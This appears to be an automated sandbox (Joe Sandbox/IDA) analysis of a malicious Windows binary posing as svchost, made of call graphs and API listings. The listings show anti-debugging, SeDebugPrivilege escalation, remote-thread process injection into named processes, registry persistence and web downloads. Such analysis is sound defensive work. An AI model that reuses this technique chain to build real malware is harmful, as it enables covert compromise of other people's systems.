1288 7ff68dea3b54 VirtualAlloc 1132->1288 1134 7ff68dea42bb GetTokenInformation 1135 7ff68dea42e8 CloseHandle 1134->1135 1139 7ff68dea4302 AdjustTokenPrivileges CloseHandle 1134->1139 1136 7ff68dea3b24 VirtualFree 1135->1136 1137 7ff68dea42fd 1136->1137 1137->1131 1289 7ff68dea3b24 1139->1289 1142 7ff68dea3d0f PathFindFileNameW wcslen 1141->1142 1143 7ff68dea3dd2 wcsncpy 1141->1143 1144 7ff68dea3d49 1142->1144 1143->1144 1144->847 1146 7ff68dea43d0 GetLastError 1145->1146 1147 7ff68dea34b8 1145->1147 1146->1147 1148 7ff68dea43dd CloseHandle 1146->1148 1147->854 1147->856 1148->1147 1292 7ff68dea38c4 1149->1292 1151 7ff68dea32fd 1295 7ff68dea46e4 CreateFileW 1151->1295 1153 7ff68dea3357 CreateThread 1153->868 1154 7ff68dea3315 1154->1153 1307 7ff68dea40c4 1154->1307 1159 7ff68dea38c4 11 API calls 1158->1159 1160 7ff68dea328c 1159->1160 1346 7ff68dea44b4 CreateFileW 1160->1346 1164 7ff68dea3744 3 API calls 1163->1164 1165 7ff68dea3a9f 1164->1165 1166 7ff68dea38c4 11 API calls 1165->1166 1167 7ff68dea3aa9 GetModuleFileNameW DeleteFileW CopyFileW 1166->1167 1168 7ff68dea3aeb SetFileAttributesW 1167->1168 1170 7ff68dea35a7 1167->1170 1358 7ff68dea39b4 RegOpenKeyExW 1168->1358 1171 7ff68dea33ec GetVersionExW 1170->1171 1172 7ff68dea341d 1171->1172 1172->881 1172->882 1173->898 1174->900 1175->902 1176->904 1177->906 1178->908 1179->910 1180->912 1181->914 1182->916 1183->918 1184->920 1185->922 1186->924 1187->926 1188->928 1189->930 1190->932 1191->934 1192->936 1193->938 1194->940 1195->942 1196->944 1197->946 1198->948 1199->950 1200->952 1201->954 1202->956 1203->958 1204->960 1205->962 1206->964 1207->966 1208->968 1209->970 1210->972 1211->974 1212->976 1213->978 1214->980 1215->982 1216->984 1217->986 1218->988 1219->990 1220->992 1221->994 1222->996 1223->998 1224->1000 1225->1002 1226->1004 1227->1006 1228->1008 1229->1010 1230->1012 1231->1014 1232->1016 1233->1018 1234->1020 1235->1022 1236->1024 1237->1026 1238->1028 1239->1030 1240->1032 1241->1034 1242->1036 1243->1038 1244->1040 1245->1042 1246->1044 1247->1046 1248->1048 1249->1050 1250->1052 1251->1054 1252->1056 1253->1058 1254->1060 1255->1062 1256->1064 1257->1066 1258->1068 1259->1070 1260->1072 1261->1074 1262->1076 1263->1078 1264->1080 1265->1082 1266->1084 1267->1086 1268->1088 1269->1090 1270->1092 1271->1094 1272->1096 1273->1098 1274->1100 1275->1102 1276->1104 1277->1106 1278->1108 1279->1110 1280->1112 1281->1114 1282->1116 1283->1118 1284->1120 1285->1122 1286->1124 1287->1126 1288->1134 1290 7ff68dea3b35 VirtualFree 1289->1290 1291 7ff68dea3b48 1289->1291 1290->1291 1291->1131 1322 7ff68dea3744 GetWindowsDirectoryW 1292->1322 1294 7ff68dea38f3 8 API calls 1294->1151 1296 7ff68dea4745 GetFileSize GetProcessHeap RtlAllocateHeap 1295->1296 1297 7ff68dea473e 1295->1297 1298 7ff68dea478e CloseHandle 1296->1298 1299 7ff68dea47a0 ReadFile 1296->1299 1297->1154 1298->1297 1300 7ff68dea47ef 1299->1300 1301 7ff68dea47c7 GetProcessHeap HeapFree CloseHandle 1299->1301 1302 7ff68dea4808 GetProcessHeap HeapFree CloseHandle 1300->1302 1304 7ff68dea4830 1300->1304 1301->1297 1302->1297 1303 7ff68dea499b GetProcessHeap RtlFreeHeap CloseHandle 1303->1297 1304->1303 1305 7ff68dea48eb GetProcessHeap RtlAllocateHeap 1304->1305 1306 7ff68dea4934 1305->1306 1306->1303 1327 7ff68dea4004 CreateToolhelp32Snapshot 1307->1327 1310 7ff68dea40e4 1311 7ff68dea414b GetCurrentProcess OpenProcessToken 1310->1311 1312 7ff68dea41c2 OpenProcess 1311->1312 1313 7ff68dea4168 LookupPrivilegeValueW 1311->1313 1316 7ff68dea41ee 1312->1316 1317 7ff68dea41e4 1312->1317 1314 7ff68dea4190 AdjustTokenPrivileges 1313->1314 1315 7ff68dea41b7 CloseHandle 1313->1315 1314->1315 1315->1312 1316->1317 1321 7ff68dea4222 WaitForSingleObject 1316->1321 1334 7ff68dea2cb8 1316->1334 1319 7ff68dea424f 1317->1319 1320 7ff68dea4244 CloseHandle 1317->1320 1319->1153 1320->1319 1321->1311 1321->1317 1323 7ff68dea378e 1322->1323 1324 7ff68dea3798 GetVolumeInformationW 1322->1324 1323->1324 1325 7ff68dea3814 1324->1325 1326 7ff68dea387e wsprintfW 1325->1326 1326->1294 1328 7ff68dea403f Process32FirstW 1327->1328 1329 7ff68dea3342 1327->1329 1330 7ff68dea405e wcscmp 1328->1330 1331 7ff68dea4099 CloseHandle 1328->1331 1329->1310 1332 7ff68dea4082 Process32NextW 1330->1332 1333 7ff68dea4075 1330->1333 1331->1329 1332->1330 1332->1331 1333->1331 1335 7ff68dea2d0b 1334->1335 1337 7ff68dea2d2b 1335->1337 1338 7ff68dea2d4d VirtualAllocEx 1335->1338 1342 7ff68dea2a88 1335->1342 1337->1316 1338->1337 1339 7ff68dea2d87 WriteProcessMemory 1338->1339 1339->1337 1340 7ff68dea2dd0 VirtualProtectEx 1339->1340 1340->1337 1341 7ff68dea2e03 CreateRemoteThread 1340->1341 1341->1335 1341->1337 1343 7ff68dea2b01 1342->1343 1344 7ff68dea2c0a StrStrA 1343->1344 1345 7ff68dea2b08 1343->1345 1344->1343 1344->1345 1345->1335 1347 7ff68dea452b GetLastError 1346->1347 1348 7ff68dea450a 1346->1348 1350 7ff68dea329f CreateThread Sleep 1347->1350 1352 7ff68dea4404 GetFileSize 1348->1352 1350->870 1357 7ff68dea3b54 VirtualAlloc 1352->1357 1354 7ff68dea4430 1355 7ff68dea4444 SetFilePointer ReadFile 1354->1355 1356 7ff68dea447a CloseHandle 1354->1356 1355->1356 1356->1350 1357->1354 1359 7ff68dea39f5 1358->1359 1360 7ff68dea39f9 RegSetValueExW RegCloseKey 1358->1360 1359->1170 1360->1359 1410 7ff68dea2f9c 1411 7ff68dea38c4 11 API calls 1410->1411 1412 7ff68dea2fdb 1411->1412 1413 7ff68dea46e4 17 API calls 1412->1413 1414 7ff68dea2fff 1413->1414 1415 7ff68dea40c4 5 API calls 1414->1415 1416 7ff68dea3022 1415->1416 1417 7ff68dea40e4 13 API calls 1416->1417 1418 7ff68dea3037 GetProcessHeap HeapFree 1417->1418 1444 7ff68dea1cdc 1445 7ff68dea1d06 InternetOpenW 1444->1445 1446 7ff68dea1d40 InternetOpenUrlW 1445->1446 1447 7ff68dea1d33 Sleep 1445->1447 1448 7ff68dea1d77 InternetOpenUrlW 1446->1448 1449 7ff68dea1dc9 HttpQueryInfoA 1446->1449 1447->1445 1448->1449 1450 7ff68dea1dae InternetCloseHandle Sleep 1448->1450 1451 7ff68dea1e1e 1449->1451 1452 7ff68dea1df8 InternetCloseHandle InternetCloseHandle Sleep 1449->1452 1450->1445 1453 7ff68dea1e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1451->1453 1454 7ff68dea1e28 InternetCloseHandle InternetOpenUrlW 1451->1454 1452->1445 1455 7ff68dea1eea InternetCloseHandle InternetCloseHandle 1453->1455 1460 7ff68dea1f04 1453->1460 1454->1453 1456 7ff68dea1e6a InternetCloseHandle Sleep 1454->1456 1457 7ff68dea1f83 1455->1457 1456->1445 1458 7ff68dea1f0c InternetReadFile 1459 7ff68dea1f5a InternetCloseHandle InternetCloseHandle 1458->1459 1458->1460 1459->1457 1460->1458 1460->1459 1461 7ff68dea30dc 1467 7ff68dea30e5 1461->1467 1462 7ff68dea31d1 1465 7ff68dea3c24 RegDeleteKeyW 1465->1467 1466 7ff68dea3e24 9 API calls 1466->1467 1467->1462 1467->1465 1467->1466 1468 7ff68dea39b4 3 API calls 1467->1468 1470 7ff68dea45c4 CreateFileW 1467->1470 1475 7ff68dea3b84 RegOpenKeyExW 1467->1475 1469 7ff68dea31c1 Sleep 1468->1469 1469->1467 1471 7ff68dea461f 1470->1471 1472 7ff68dea465a 1470->1472 1478 7ff68dea4544 SetFilePointer WriteFile SetEndOfFile 1471->1478 1472->1467 1474 7ff68dea463b SetFileAttributesW CloseHandle 1474->1472 1476 7ff68dea3c12 1475->1476 1477 7ff68dea3bd8 RegSetValueExW RegCloseKey 1475->1477 1476->1467 1477->1476 1478->1474

                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                  callgraph 0 Function_00007FF68DEA3B24 1 Function_00007FF68DEA3C24 2 Function_00007FF68DEA3E24 3 Function_00007FF68DEAD91D 4 Function_00007FF68DEAC91A 5 Function_00007FF68DEA321C 6 Function_00007FF68DEAD615 7 Function_00007FF68DEAD915 8 Function_00007FF68DEAEC12 9 Function_00007FF68DEA3F14 10 Function_00007FF68DEA3714 11 Function_00007FF68DEAB508 12 Function_00007FF68DEAE008 13 Function_00007FF68DEA3609 14 Function_00007FF68DEA2008 15 Function_00007FF68DEA2F0C 16 Function_00007FF68DEAC501 17 Function_00007FF68DEA1000 18 Function_00007FF68DEAD904 19 Function_00007FF68DEA4004 20 Function_00007FF68DEA4404 103 Function_00007FF68DEA3B54 20->103 21 Function_00007FF68DEAABF9 22 Function_00007FF68DEAC2F9 23 Function_00007FF68DEAABF7 24 Function_00007FF68DEAC2F7 25 Function_00007FF68DEA36FC 26 Function_00007FF68DEAABFB 27 Function_00007FF68DEABCF1 28 Function_00007FF68DEAB2F4 29 Function_00007FF68DEAC2F5 30 Function_00007FF68DEAABF2 31 Function_00007FF68DEAE8F3 32 Function_00007FF68DEA32EC 36 Function_00007FF68DEA40E4 32->36 37 Function_00007FF68DEA46E4 32->37 51 Function_00007FF68DEA40C4 32->51 52 Function_00007FF68DEA38C4 32->52 91 Function_00007FF68DEA3C64 32->91 33 Function_00007FF68DEA33EC 34 Function_00007FF68DEA31EC 84 Function_00007FF68DEA306C 34->84 35 Function_00007FF68DEA36EC 55 Function_00007FF68DEA2CB8 36->55 80 Function_00007FF68DEA4674 37->80 38 Function_00007FF68DEA3CE4 39 Function_00007FF68DEAA0DD 40 Function_00007FF68DEAB3DA 41 Function_00007FF68DEA1CDC 42 Function_00007FF68DEA30DC 42->1 42->2 53 Function_00007FF68DEA45C4 42->53 56 Function_00007FF68DEA39B4 42->56 72 Function_00007FF68DEA3B84 42->72 43 Function_00007FF68DEAA2D0 44 Function_00007FF68DEA1FC8 45 Function_00007FF68DEAEFCA 46 Function_00007FF68DEA33CC 105 Function_00007FF68DEA2048 46->105 47 Function_00007FF68DEAC9CB 48 Function_00007FF68DEADEC1 49 Function_00007FF68DEAD0C4 50 Function_00007FF68DEADCC2 51->19 107 Function_00007FF68DEA3744 52->107 108 Function_00007FF68DEA4544 53->108 54 Function_00007FF68DEAD8B8 67 Function_00007FF68DEA2A88 55->67 57 Function_00007FF68DEA44B4 57->20 58 Function_00007FF68DEABEAD 59 Function_00007FF68DEA33AC 59->105 60 Function_00007FF68DEA10A0 60->17 99 Function_00007FF68DEA1050 60->99 61 Function_00007FF68DEA43A4 62 Function_00007FF68DEAE999 63 Function_00007FF68DEAE997 64 Function_00007FF68DEA359D 65 Function_00007FF68DEA2F9C 65->36 65->37 65->51 65->52 65->91 66 Function_00007FF68DEAE99B 75 Function_00007FF68DEA2978 67->75 68 Function_00007FF68DEA1F88 69 Function_00007FF68DEAA18A 70 Function_00007FF68DEA338C 70->105 71 Function_00007FF68DEAA27F 73 Function_00007FF68DEAA778 74 Function_00007FF68DEAA776 76 Function_00007FF68DEA327C 76->52 76->57 77 Function_00007FF68DEADE70 78 Function_00007FF68DEAA772 79 Function_00007FF68DEA3A74 79->52 79->56 79->107 81 Function_00007FF68DEAC673 82 Function_00007FF68DEAF26A 83 Function_00007FF68DEA2E6C 84->83 85 Function_00007FF68DEAA061 86 Function_00007FF68DEAD361 87 Function_00007FF68DEAB15F 88 Function_00007FF68DEACF65 89 Function_00007FF68DEAD365 90 Function_00007FF68DEA4264 90->0 90->103 92 Function_00007FF68DEAA258 93 Function_00007FF68DEAEC58 94 Function_00007FF68DEADE59 95 Function_00007FF68DEAC65C 96 Function_00007FF68DEAA05A 97 Function_00007FF68DEA345C 97->5 97->9 97->32 97->33 97->38 97->60 97->61 97->76 97->79 97->90 98 Function_00007FF68DEAA04E 100 Function_00007FF68DEACD54 101 Function_00007FF68DEADC55 102 Function_00007FF68DEAA052 104 Function_00007FF68DEADC46 105->14 105->44 105->68 106 Function_00007FF68DEAD33F 107->10 109 Function_00007FF68DEAD339

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 231 7ff68dea345c-7ff68dea3472 call 7ff68dea10a0 call 7ff68dea321c 236 7ff68dea3474-7ff68dea3476 ExitProcess 231->236 237 7ff68dea347c-7ff68dea34aa call 7ff68dea4264 call 7ff68dea3ce4 call 7ff68dea3f14 231->237 244 7ff68dea34fb-7ff68dea350e call 7ff68dea3f14 237->244 245 7ff68dea34ac-7ff68dea34bd call 7ff68dea43a4 237->245 250 7ff68dea3510-7ff68dea3521 call 7ff68dea43a4 244->250 251 7ff68dea354c-7ff68dea355f call 7ff68dea3f14 244->251 252 7ff68dea34bf-7ff68dea34d0 call 7ff68dea43a4 245->252 253 7ff68dea34d2-7ff68dea34d4 ExitProcess 245->253 262 7ff68dea3523-7ff68dea3525 ExitProcess 250->262 263 7ff68dea352b call 7ff68dea327c 250->263 260 7ff68dea3561-7ff68dea3572 call 7ff68dea43a4 251->260 261 7ff68dea35a2-7ff68dea35b8 call 7ff68dea3a74 call 7ff68dea33ec 251->261 252->253 264 7ff68dea34da call 7ff68dea32ec 252->264 275 7ff68dea3574-7ff68dea3576 ExitProcess 260->275 276 7ff68dea357c call 7ff68dea327c 260->276 282 7ff68dea360e-7ff68dea36d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 261->282 283 7ff68dea35ba-7ff68dea35cb call 7ff68dea43a4 261->283 271 7ff68dea3530-7ff68dea3535 263->271 269 7ff68dea34df-7ff68dea34e4 264->269 273 7ff68dea34f3-7ff68dea34f5 ExitProcess 269->273 274 7ff68dea34e6-7ff68dea34f1 Sleep 269->274 277 7ff68dea3544-7ff68dea3546 ExitProcess 271->277 278 7ff68dea3537-7ff68dea3542 Sleep 271->278 274->269 284 7ff68dea3581-7ff68dea3586 276->284 278->271 289 7ff68dea35e0-7ff68dea35e2 ExitProcess 283->289 290 7ff68dea35cd-7ff68dea35de call 7ff68dea43a4 283->290 286 7ff68dea3595-7ff68dea3597 ExitProcess 284->286 287 7ff68dea3588-7ff68dea3593 Sleep 284->287 287->284 290->289 293 7ff68dea35e8 call 7ff68dea32ec 290->293 295 7ff68dea35ed-7ff68dea35f2 293->295 296 7ff68dea3601-7ff68dea3603 ExitProcess 295->296 297 7ff68dea35f4-7ff68dea35ff Sleep 295->297 297->295
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                                                  • Opcode ID: 14c2fa25876479cd5c5c4ade1a135fd90693f5b51d36c120125410f70aa3ba6a
                                                                                                                                                                                                  • Instruction ID: 57088db78964b017d4256cd8d882242c5dca6ed8f36ee8e35c886849517a6257
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14c2fa25876479cd5c5c4ade1a135fd90693f5b51d36c120125410f70aa3ba6a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0161F820A1CA53D1EA65ABB5A89D37E22B0BFB5701F50013DD45EE65E1FE2DE40DC630

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction ID: 6614eb69e7db68fb893274e702d0007f17de7a1a0eb2dc5981dfc78700ea12d4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1414A72618A82C6E350DB51F44876AB7B0FFE4754F504138EA8996A98EFBDD448CB10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction ID: 7233c69bff217b388f3ed7ba30086d2bbd1ad6a6c2a72999c924247f950bf6aa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46311332618A82C6D750DB45E48876EB7B0FBE4780F100139FA8E93A68EF7CD449CB10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction ID: af4695d7cd4395047c6e985774e471a7381427a997a2c2f47864c68c1c5912e0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C541B43260CA86C6E770CB15E45876AB7B0FB94B84F105029EACDA7B58EF7DD448CB50

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction ID: a767963d47793ba6af96785e2c6ade7d313f3509608d30a825b8cd4932211fd5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F781E072608B82C6D650DB55F48436AB7B0FBD9B91F104139EA8D93B68EF7CD458CB10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF68DEA3784
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3744: GetVolumeInformationW.KERNELBASE ref: 00007FF68DEA3801
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3744: wsprintfW.USER32 ref: 00007FF68DEA38A2
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA390D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3922
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3935
                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3945
                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3958
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA396D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3980
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3995
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                  • Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                  • Instruction ID: f57ec2401ea0e9f999dc4922fd5ba89cceb52bb247bceeeb7dd41d5eb654ea41
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D110D21628987C5DB60EF25F89876A63B2FFD4B80F515035DA4E97A29EE3CD40DC710

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
